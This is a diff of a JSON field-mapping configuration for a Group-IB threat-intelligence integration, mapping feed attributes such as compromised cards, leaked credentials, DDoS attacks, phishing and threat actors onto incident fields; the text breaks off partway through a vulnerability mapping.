-618,17 +315,14 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Source": { "complex": { - "accessor": "", "filters": [], "root": "sourceType", "transformers": [] - }, - "simple": "" + } }, "GIB Threat Actor ID": { "complex": { @@ -636,8 +330,7 @@ "filters": [], "root": "threatActor", "transformers": [] - }, - "simple": "" + } }, "GIB Threat Actor Name": { "complex": { @@ -645,8 +338,7 @@ "filters": [], "root": "threatActor", "transformers": [] - }, - "simple": "" + } }, "GIB Threat Actor is APT": { "complex": { @@ -654,265 +346,23 @@ "filters": [], "root": "threatActor", "transformers": [] - }, - "simple": "" + } }, - "GIB Victim IP": { - "complex": { - "accessor": "ip", - "filters": [], - "root": "client.ipv4", - "transformers": [] - }, - "simple": "" - }, - "Phone Number": { + "Phone Number": { "complex": { "accessor": "phone", "filters": [], - "root": "person", - "transformers": [] - }, - "simple": "" - }, - "severity": { - "complex": { - "accessor": "", - "filters": [], - "root": "systemSeverity", - "transformers": [] - }, - "simple": "" - }, - "GIB Admiralty Code": { - "complex": { - "accessor": "admiraltyCode", - "filters": [], - "root": "evaluation", - "transformers": [] - }, - "simple": "" - }, - "GIB Credibility": { - "complex": { - "accessor": "credibility", - "filters": [], - "root": "evaluation", - "transformers": [] - }, - "simple": "" - }, - "GIB Reliability": { - "complex": { - "accessor": "reliability", - "filters": [], - "root": "evaluation", - "transformers": [] - }, - "simple": "" - } - } - }, - "GIB Compromised Card": { - "dontMapEventToLabels": true, - "internalMapping": { - "GIB Address": { - "complex": { - "accessor": "address", - "filters": [], - "root": "owner", - "transformers": [] - }, - "simple": "" - }, - "GIB CVV": { - "complex": { - "accessor": "cvv", - "filters": [], - "root": "cardInfo", - "transformers": [] - }, - "simple": "" - }, - "GIB Card Issuer": { - "complex": { - "accessor": "issuer", - "filters": [], - "root": "cardInfo.issuer", - "transformers": [] - }, - "simple": "" - }, - "GIB Card Number": { - "complex": { - "accessor": "number", - "filters": [], - "root": "cardInfo", - "transformers": [] - }, - "simple": "" - }, - "GIB Card Type": { - "complex": { - "accessor": "type", - "filters": [], - "root": "cardInfo", - "transformers": [] - }, - "simple": "" - }, - "GIB Card Valid Thru": { - "complex": { - "accessor": "validThru", - "filters": [], - "root": "cardInfo", - "transformers": [] - }, - "simple": "" - }, - "GIB Date Compromised": { - "complex": { - "accessor": "", - "filters": [], - "root": "dateCompromised", - "transformers": [] - }, - "simple": "" - }, - "GIB Date of Detection": { - "complex": { - "accessor": "", - "filters": [], - "root": "dateDetected", - "transformers": [] - }, - "simple": "" - }, - "GIB Email": { - "complex": { - "accessor": "email", - "filters": [], - "root": "owner", - "transformers": [] - }, - "simple": "" - }, - "GIB ID": { - "complex": { - "accessor": "", - "filters": [], - "root": "id", - "transformers": [] - }, - "simple": "" - }, - "GIB Malware Name": { - "complex": { - "accessor": "name", - "filters": [], - "root": "malware", - "transformers": [] - }, - "simple": "" - }, - "GIB Payment System": { - "complex": { - "accessor": "system", - "filters": [], - "root": "cardInfo", - "transformers": [] - }, - "simple": "" - }, - "GIB Person": { - "complex": { - "accessor": "name", - "filters": [], "root": "owner", "transformers": [] - }, - "simple": "" - }, - "GIB Portal Link": { - "complex": { - "accessor": "", - "filters": [], - "root": "portalLink", - "transformers": [] - }, - "simple": "" - }, - "GIB Related Indicators Data": { - "complex": { - "accessor": "", - "filters": [], - "root": "relatedIndicatorsData", - "transformers": [] - }, - "simple": "" + } }, - "GIB Severity": { + "severity": { "complex": { "accessor": "severity", "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" - }, - "GIB Source": { - "complex": { - "accessor": "", - "filters": [], - "root": "sourceType", - "transformers": [] - }, - "simple": "" - }, - "GIB Threat Actor ID": { - "complex": { - "accessor": "id", - "filters": [], - "root": "threatActor", - "transformers": [] - }, - "simple": "" - }, - "GIB Threat Actor Name": { - "complex": { - "accessor": "name", - "filters": [], - "root": "threatActor", - "transformers": [] - }, - "simple": "" - }, - "GIB Threat Actor is APT": { - "complex": { - "accessor": "isAPT", - "filters": [], - "root": "threatActor", - "transformers": [] - }, - "simple": "" - }, - "Phone Number": { - "complex": { - "accessor": "phone", - "filters": [], - "root": "owner", - "transformers": [] - }, - "simple": "" - }, - "severity": { - "complex": { - "accessor": "", - "filters": [], - "root": "systemSeverity", - "transformers": [] - }, - "simple": "" + } }, "GIB Admiralty Code": { "complex": { @@ -920,8 +370,7 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Credibility": { "complex": { @@ -929,8 +378,7 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Reliability": { "complex": { @@ -938,8 +386,7 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } } } }, @@ -948,16 +395,13 @@ "internalMapping": { "GIB Email": { "complex": { - "accessor": "", "filters": [], "root": "email", "transformers": [ { "args": { "separator": { - "isContext": false, "value": { - "complex": null, "simple": ", " } } @@ -965,39 +409,23 @@ "operator": "join" } ] - }, - "simple": "" + } }, "GIB ID": { - "complex": { - "accessor": "", - "filters": [], - "root": "id", - "transformers": [] - }, - "simple": "" + "simple": "id" }, "GIB Leak Name": { - "complex": { - "accessor": "", - "filters": [], - "root": "leakName", - "transformers": [] - }, - "simple": "" + "simple": "leakName" }, "GIB Password": { "complex": { - "accessor": "", "filters": [], "root": "password", "transformers": [ { "args": { "separator": { - "isContext": false, "value": { - "complex": null, "simple": ", " } } @@ -1005,53 +433,72 @@ "operator": "join" } ] - }, - "simple": "" + } }, "GIB Severity": { - "complex": { - "accessor": "severity", - "filters": [], - "root": "evaluation", - "transformers": [] - }, - "simple": "" + "simple": "evaluation.severity" }, "severity": { - "complex": { - "accessor": "", - "filters": [], - "root": "systemSeverity", - "transformers": [] - }, - "simple": "" + "simple": "systemSeverity" }, "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "Country": { "complex": { - "accessor": "admiraltyCode", + "accessor": "[0]", "filters": [], - "root": "evaluation", + "root": "countries", "transformers": [] - }, - "simple": "" + } }, - "GIB Credibility": { + "Description": { + "simple": "description" + }, + "GIB Email Domains": { + "simple": "emailDomains" + }, + "GIB Emails": { + "simple": "emails" + }, + "GIB Leak Published": { + "simple": "leakPublished" + }, + "GIB Passwords": { + "simple": "passwords" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Update Time": { + "simple": "updateTime" + }, + "GIB Upload Time": { + "simple": "uploadTime" + }, + "Target": { "complex": { - "accessor": "credibility", + "accessor": "[0]", "filters": [], - "root": "evaluation", + "root": "targetedCompany", "transformers": [] - }, - "simple": "" + } }, - "GIB Reliability": { + "name": { "complex": { - "accessor": "reliability", "filters": [], - "root": "evaluation", + "root": "title", "transformers": [] - }, - "simple": "" + } } } }, @@ -1060,57 +507,27 @@ "internalMapping": { "GIB Date of Detection": { "complex": { - "accessor": "", "filters": [], "root": "dateDetected", "transformers": [] - }, - "simple": "" + } }, "GIB ID": { "complex": { - "accessor": "", "filters": [], "root": "id", "transformers": [] - }, - "simple": "" + } }, "GIB Leaked File Name": { "complex": { - "accessor": "", "filters": [], - "root": "name", + "root": "leaked_file_name", "transformers": [] - }, - "simple": "" + } }, "GIB Portal Link": { - "complex": { - "accessor": "", - "filters": [], - "root": "file", - "transformers": [] - }, - "simple": "" - }, - "GIB Repository": { - "complex": { - "accessor": "", - "filters": [], - "root": "repository", - "transformers": [] - }, - "simple": "" - }, - "GIB Revisions": { - "complex": { - "accessor": "", - "filters": [], - "root": "revisions", - "transformers": [] - }, - "simple": "" + "simple": "portalLink" }, "GIB Severity": { "complex": { @@ -1118,26 +535,21 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Source": { "complex": { - "accessor": "", "filters": [], - "root": "source", + "root": "sourceType", "transformers": [] - }, - "simple": "" + } }, "severity": { "complex": { - "accessor": "", "filters": [], "root": "systemSeverity", "transformers": [] - }, - "simple": "" + } }, "GIB Admiralty Code": { "complex": { @@ -1145,8 +557,7 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Credibility": { "complex": { @@ -1154,8 +565,7 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Reliability": { "complex": { @@ -1163,8 +573,19 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } + }, + "GIB Date Created": { + "simple": "dateCreated" + }, + "GIB GIT Source": { + "simple": "source" + }, + "GIB OSI Git Repository Files Table": { + "simple": "files" + }, + "GIB Related Indicators Data": { + "simple": "indicators" } } }, @@ -1173,66 +594,34 @@ "internalMapping": { "GIB Data Hash": { "complex": { - "accessor": "", "filters": [], "root": "hash", "transformers": [] - }, - "simple": "" + } }, "GIB Date Created": { "complex": { - "accessor": "", "filters": [], "root": "created", "transformers": [] - }, - "simple": "" + } }, "GIB ID": { "complex": { - "accessor": "", "filters": [], "root": "id", "transformers": [] - }, - "simple": "" + } }, "GIB Leaked Data": { "complex": { - "accessor": "", "filters": [], "root": "data", "transformers": [] - }, - "simple": "" - }, - "GIB Link List": { - "complex": { - "accessor": "", - "filters": [], - "root": "linkList", - "transformers": [] - }, - "simple": "" - }, - "GIB Matches": { - "complex": { - "accessor": "", - "filters": [], - "root": "matches", - "transformers": [] - }, - "simple": "" + } }, "GIB Portal Link": { - "complex": { - "accessor": "", - "filters": [], - "root": "portalLink", - "transformers": [] - }, - "simple": "" + "simple": "portalLink" }, "GIB Severity": { "complex": { @@ -1240,17 +629,14 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "severity": { "complex": { - "accessor": "", "filters": [], "root": "systemSeverity", "transformers": [] - }, - "simple": "" + } }, "GIB Admiralty Code": { "complex": { @@ -1258,8 +644,7 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Credibility": { "complex": { @@ -1267,8 +652,7 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Reliability": { "complex": { @@ -1276,167 +660,1342 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } + }, + "GIB Link List Table": { + "simple": "linkList" + }, + "GIB Matches Table": { + "simple": "matches" + }, + "GIB Source": { + "simple": "sourceType" } } }, - "GIB Targeted Malware": { + "dbot_classification_incident_type_all": { "dontMapEventToLabels": true, + "internalMapping": {} + }, + "GIB Attacks DDOS": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB CNC": { + "simple": "cnc.cnc" + }, + "GIB CNC Domain": { + "simple": "cnc.domain" + }, + "GIB CNC Port": { + "simple": "cnc.port" + }, + "GIB CNC URL": { + "simple": "cnc.url" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB DDOS Date Begin": { + "simple": "dateBegin" + }, + "GIB DDOS Date End": { + "simple": "dateEnd" + }, + "GIB DDOS Date Registration": { + "simple": "dateReg" + }, + "GIB DDOS Duration": { + "simple": "duration" + }, + "GIB DDOS Protocol": { + "simple": "protocol" + }, + "GIB DDOS Request Body": { + "simple": "requestData.body" + }, + "GIB DDOS Request Body Hash": { + "simple": "requestData.bodyHash" + }, + "GIB DDOS Request Data Link": { + "simple": "requestData.link" + }, + "GIB DDOS Request Headers Hash": { + "simple": "requestData.headersHash" + }, + "GIB DDOS Source": { + "simple": "source" + }, + "GIB DDOS Target ASN": { + "simple": "target.asn" + }, + "GIB DDOS Target Category": { + "simple": "target.category" + }, + "GIB DDOS Target City": { + "simple": "target.city" + }, + "GIB DDOS Target Country Code": { + "simple": "target.countryCode" + }, + "GIB DDOS Target Country Name": { + "simple": "target.countryName" + }, + "GIB DDOS Target Domain": { + "simple": "target.domain" + }, + "GIB DDOS Target IP": { + "simple": "target.ip" + }, + "GIB DDOS Target Port": { + "simple": "target.port" + }, + "GIB DDOS Target Provider": { + "simple": "target.provider" + }, + "GIB DDOS Target Region": { + "simple": "target.region" + }, + "GIB DDOS Target URL": { + "simple": "target.url" + }, + "GIB DDOS Type": { + "simple": "type" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Malware Name": { + "simple": "malwareName" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Threat Actor ID": { + "simple": "threatActor.id" + }, + "GIB Threat Actor Name": { + "simple": "threatActor.name" + }, + "GIB Threat Actor is APT": { + "simple": "threatActor.isAPT" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Attacks Deface": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Country Code": { + "simple": "targetIp.countryCode" + }, + "GIB Country Name": { + "simple": "targetIp.countryName" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Deface Contacts": { + "simple": "contacts" + }, + "GIB Deface Date": { + "simple": "date" + }, + "GIB Deface Site URL": { + "simple": "siteUrl" + }, + "GIB Deface Source": { + "simple": "source" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Mirror Link": { + "simple": "mirrorLink" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Provider Domain": { + "simple": "providerDomain" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Target ASN": { + "simple": "targetIp.asn" + }, + "GIB Target City": { + "simple": "targetIp.city" + }, + "GIB Target Domain": { + "simple": "targetDomain" + }, + "GIB Target Domain Provider": { + "simple": "targetDomainProvider" + }, + "GIB Target IP": { + "simple": "targetIp.ip" + }, + "GIB Target Provider": { + "simple": "targetIp.provider" + }, + "GIB Target Region": { + "simple": "targetIp.region" + }, + "GIB Threat Actor ID": { + "simple": "threatActor.id" + }, + "GIB Threat Actor Name": { + "simple": "threatActor.name" + }, + "GIB Threat Actor is APT": { + "simple": "threatActor.isAPT" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Attacks Phishing Group": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Country Name": { + "simple": "phishing_ip.countryName" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Phishing Brand": { + "simple": "brand" + }, + "GIB Phishing Date Added": { + "simple": "added" + }, + "GIB Phishing Date Blocked": { + "simple": "blocked" + }, + "GIB Phishing Date Detected": { + "simple": "detected" + }, + "GIB Phishing Date Updated": { + "simple": "updated" + }, + "GIB Phishing Domain": { + "simple": "domainInfo.domain" + }, + "GIB Phishing Domain Expiration Date": { + "simple": "domainInfo.expirationDate" + }, + "GIB Phishing Domain Puny": { + "simple": "domainInfo.domainPuny" + }, + "GIB Phishing IP Table": { + "simple": "phishing_ip" + }, + "GIB Phishing Kit Source": { + "simple": "source" + }, + "GIB Phishing Kit Table": { + "simple": "phishing_kit_table" + }, + "GIB Phishing Objectives": { + "simple": "objective" + }, + "GIB Phishing Registrar": { + "simple": "domainInfo.registrar" + }, + "GIB Phishing Sources": { + "simple": "source" + }, + "GIB Phishing URLs": { + "simple": "phishing_urls" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Threat Actor ID": { + "simple": "threatActor.id" + }, + "GIB Threat Actor Name": { + "simple": "threatActor.name" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Attacks Phishing Kit": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Data Hash": { + "simple": "hash" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB Date of Detection": { + "simple": "dateDetected" + }, + "GIB Downloaded From Table": { + "simple": "downloadedFrom" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Phishing Kit Email": { + "simple": "emails" + }, + "GIB Phishing Kit Source": { + "simple": "source" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Compromised Account Group": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Address": { + "simple": "person.address" + }, + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Compromised Events Information Table": { + "simple": "events_table" + }, + "GIB Compromised Login": { + "simple": "login" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Date First Compromised": { + "simple": "dateFirstCompromised" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Compromised": { + "simple": "dateLastCompromised" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB Date of Detection": { + "simple": "person.dateDetected" + }, + "GIB Email": { + "simple": "person.email" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Parsed Login Domain": { + "simple": "parsedLogin.domain" + }, + "GIB Parsed Login IP": { + "simple": "parsedLogin.ip" + }, + "GIB Password": { + "simple": "password" + }, + "GIB Person": { + "simple": "person.name" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Service Domain": { + "simple": "service.domain" + }, + "GIB Service IP": { + "simple": "service.ip" + }, + "GIB Service URL": { + "simple": "service.url" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "Phone Number": { + "simple": "person.phone" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Compromised Card Group": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Address": { + "simple": "address" + }, + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB CVV": { + "simple": "cvv" + }, + "GIB Card Issuer": { + "simple": "issuer" + }, + "GIB Card Number": { + "simple": "number" + }, + "GIB Card Type": { + "simple": "type" + }, + "GIB Card Valid Thru": { + "simple": "validThru" + }, + "GIB Compromised Events Table": { + "simple": "compromised_events" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Date First Compromised": { + "simple": "dateFirstCompromised" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Compromised": { + "simple": "dateLastCompromised" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB Email": { + "simple": "email" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Malware Table": { + "simple": "malware" + }, + "GIB Payment System": { + "simple": "payment_system" + }, + "GIB Person": { + "simple": "owner_name" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Threat Actors Table": { + "simple": "threatActor" + }, + "Phone Number": { + "simple": "phone" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Compromised Mule": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Compromised Account": { + "simple": "account" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Data Hash": { + "simple": "hash" + }, + "GIB Date Add": { + "simple": "dateAdd" + }, + "GIB Date Incident": { + "simple": "dateIncident" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Organization BIC": { + "simple": "organization.bic" + }, + "GIB Organization BSB": { + "simple": "organization.bsb" + }, + "GIB Organization CLABE": { + "simple": "organization.clabe" + }, + "GIB Organization IBAN": { + "simple": "organization.iban" + }, + "GIB Organization Name": { + "simple": "organization.name" + }, + "GIB Organization SWIFT": { + "simple": "organization.swift" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Cybercriminal Threat": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Cybercriminal Expertises": { + "simple": "expertise" + }, + "GIB Cybercriminal Forums Table": { + "simple": "forumsAccounts" + }, + "GIB Cybercriminal Regions": { + "simple": "regions" + }, + "GIB Cybercriminal Sectors": { + "simple": "sectors" + }, + "GIB Cybercriminal Threat Description": { + "simple": "description" + }, + "GIB Cybercriminal Threat Title": { + "simple": "title" + }, + "GIB Date Created At": { + "simple": "createdAt" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Is Tailored": { + "simple": "isTailored" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Report Number": { + "simple": "reportNumber" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Threat Actor Country": { + "simple": "threatActor.country" + }, + "GIB Threat Actor ID": { + "simple": "threatActor.id" + }, + "GIB Threat Actor Name": { + "simple": "threatActor.name" + }, + "GIB Threat Actor is APT": { + "simple": "threatActor.isAPT" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Cybercriminal Threat Actor": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Cybercriminal Expertises": { + "simple": "expertise" + }, + "GIB Cybercriminal Malware": { + "simple": "malware" + }, + "GIB Cybercriminal Regions": { + "simple": "regions" + }, + "GIB Cybercriminal Sectors": { + "simple": "sectors" + }, + "GIB Cybercriminal Threat Actor Aliases": { + "simple": "aliases" + }, + "GIB Cybercriminal Threat Actor Description": { + "simple": "description" + }, + "GIB Cybercriminal Threat Actor Reports Table": { + "simple": "reports" + }, + "GIB Date Created At": { + "simple": "createdAt" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB Date Updated At": { + "simple": "updatedAt" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Threat Actor Name": { + "simple": "threat_actor_name" + }, + "GIB Threat Actor is APT": { + "simple": "isAPT" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Malware": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Date Updated At": { + "simple": "updatedAt" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Malware Aliases": { + "simple": "aliases" + }, + "GIB Malware Categories": { + "simple": "category" + }, + "GIB Malware Description": { + "simple": "description" + }, + "GIB Malware Langs": { + "simple": "langs" + }, + "GIB Malware Name": { + "simple": "malware_name" + }, + "GIB Malware Platforms": { + "simple": "platform" + }, + "GIB Malware Regions": { + "simple": "geoRegion" + }, + "GIB Malware Short Description": { + "simple": "shortDescription" + }, + "GIB Malware Source Countries": { + "simple": "sourceCountry" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Threat Actor ID": { + "simple": "taList.id" + }, + "GIB Threat Actor Name": { + "simple": "taList.name" + }, + "GIB Threat Actors Table": { + "simple": "taList" + }, + "GIB Threat Level": { + "simple": "threatLevel" + } + } + }, + "GIB Malware CNC": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB CNC URL": { + "simple": "cnc" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB Date of Detection": { + "simple": "dateDetected" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Malware CNC Domain": { + "simple": "domain" + }, + "GIB Malware Table": { + "simple": "malwareList" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Threat Actors Table": { + "simple": "threatActor" + } + } + }, + "GIB Nation-State Cybercriminals Threat": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Date Created At": { + "simple": "createdAt" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB Date Published": { + "simple": "datePublished" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Is Tailored": { + "simple": "isTailored" + }, + "GIB Nation-State Cybercriminal Forums Table": { + "simple": "forumsAccounts" + }, + "GIB Nation-State Cybercriminals Threat Actor Labels": { + "simple": "labels" + }, + "GIB Nation-State Cybercriminals Threat Countries": { + "simple": "countries" + }, + "GIB Nation-State Cybercriminals Threat Description": { + "simple": "description" + }, + "GIB Nation-State Cybercriminals Threat Expertises": { + "simple": "expertise" + }, + "GIB Nation-State Cybercriminals Threat Langs": { + "simple": "langs" + }, + "GIB Nation-State Cybercriminals Threat Regions": { + "simple": "regions" + }, + "GIB Nation-State Cybercriminals Threat Report Number": { + "simple": "reportNumber" + }, + "GIB Nation-State Cybercriminals Threat Sectors": { + "simple": "sectors" + }, + "GIB Nation-State Cybercriminals Threat Title": { + "simple": "title" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Threat Actor Country": { + "simple": "threatActor.country" + }, + "GIB Threat Actor ID": { + "simple": "threatActor.id" + }, + "GIB Threat Actor Name": { + "simple": "threatActor.name" + }, + "GIB Threat Actor is APT": { + "simple": "threatActor.isAPT" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Nation-State Cybercriminals Threat Actor": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Date Created At": { + "simple": "createdAt" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB Date Updated At": { + "simple": "updatedAt" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Nation-State Cybercriminals Expertises": { + "simple": "expertise" + }, + "GIB Nation-State Cybercriminals Malware": { + "simple": "malware" + }, + "GIB Nation-State Cybercriminals Regions": { + "simple": "regions" + }, + "GIB Nation-State Cybercriminals Sectors": { + "simple": "sectors" + }, + "GIB Nation-State Cybercriminals Threat Actor Aliases": { + "simple": "aliases" + }, + "GIB Nation-State Cybercriminals Threat Actor CVE": { + "simple": "cve" + }, + "GIB Nation-State Cybercriminals Threat Actor Country": { + "simple": "country" + }, + "GIB Nation-State Cybercriminals Threat Actor Description": { + "simple": "description" + }, + "GIB Nation-State Cybercriminals Threat Actor Goals": { + "simple": "goals" + }, + "GIB Nation-State Cybercriminals Threat Actor Labels": { + "simple": "labels" + }, + "GIB Nation-State Cybercriminals Threat Actor Reports Table": { + "simple": "reports" + }, + "GIB Nation-State Cybercriminals Threat Actor Roles": { + "simple": "roles" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Threat Actor Name": { + "simple": "threat_actor_name" + }, + "GIB Threat Actor is APT": { + "simple": "isAPT" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB OSI Vulnerability": { + "dontMapEventToLabels": false, + "internalMapping": { + "Description": { + "simple": "description" + }, + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Affected Software Table": { + "simple": "affectedSoftware" + }, + "GIB Bulletin Family": { + "simple": "bulletinFamily" + }, + "GIB CPE Table": { + "simple": "cpeTable" + }, + "GIB CVSS Score": { + "simple": "cvss.score" + }, + "GIB CVSS Vector": { + "simple": "cvss.vector" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB Date Modified": { + "simple": "dateModified" + }, + "GIB Date Published": { + "simple": "datePublished" + }, + "GIB Extended CVSS Base": { + "simple": "extCvss.base" + }, + "GIB Extended CVSS Exploitability": { + "simple": "extCvss.exploitability" + }, + "GIB Extended CVSS Impact": { + "simple": "extCvss.impact" + }, + "GIB Extended CVSS Overall": { + "simple": "extCvss.overall" + }, + "GIB Extended CVSS 